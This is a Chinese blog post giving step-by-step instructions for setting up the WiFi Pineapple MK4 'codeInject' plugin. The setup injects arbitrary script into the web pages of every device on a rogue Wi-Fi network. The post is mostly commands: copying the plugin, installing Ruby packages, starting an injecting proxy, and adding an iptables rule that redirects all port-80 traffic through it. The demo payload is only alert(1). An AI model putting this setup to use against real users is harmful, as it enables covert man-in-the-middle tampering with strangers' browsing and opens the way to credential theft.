wifipineapple插件:codeInject的使用

  如果在中间人攻击的时候, 能在用户的网页中插入任意代码, 可以说已经完成一半了

  wifipineapple有个codeInject插件, 可以让连上这个网络所有设备浏览网页的时候, 在网页中插入任意html代码

  但是目前我用的wifipineapple版本是MK4, 官方很久不维护这个版本的wifipineapple

  使用scp把本地的codeinject传到wifipineapple的  /pineapple/components/infusions/目录下

运行下面代码

scp -r codeinject root@172.16.42.1:/pineapple/components/infusions

  然后把opkg的源改成:

运行下面代码

http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/

  执行

运行下面代码

opkg update
opkg install ruby-cgi
opkg install ruby-core
opkg install ruby-enc
opkg install ruby-gems

  cd进入 /pineapple/components/infusions/codeinject 目录,修正ruby执行socket, getAddrInfo的错误:

运行下面代码

cp includes/install/socket.so /usr/lib/ruby/1.9/mips-linux
ln -s /usb/usr/lib/ruby /usr/lib/ruby

  cd进入  /pineapple/components/infusions/codeinject/includes/proxy 目录, 执行命令:

运行下面代码

export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usb/lib:/usb/usr/lib
export PATH=$PATH:/usb/usr/bin:/usb/usr/sbin

ruby -Kn proxy.rb --verbose --script-inject "<script>alert(1)</script>"

  添加本地数据转发:

运行下面代码

iptables -t nat -A PREROUTING  -i br-lan -p tcp --destination-port 80 -j REDIRECT --to-ports 8888

  此时连接上该wifi所有用户,浏览网页的时候,会弹出弹窗:1

EOF

作者: NONO
出处:http://www.cnblogs.com/diligenceday/
企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830 

本文作者:方方和圆圆

本文链接:https://www.cnblogs.com/diligenceday/p/8023165.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   方方和圆圆  阅读(1120)  评论(0编辑  收藏  举报
历史上的今天:
2014-12-16 angular自己的笔记
2013-12-16 nodeJS
2013-12-16 自己根据前些天热门的模版引擎文章,弄了一个模版引擎

再过一百年, 我会在哪里?

💬
评论
📌
收藏
💗
关注
👍
推荐
🚀
回顶
收起
点击右上角即可分享
微信分享提示
SQL AI 助手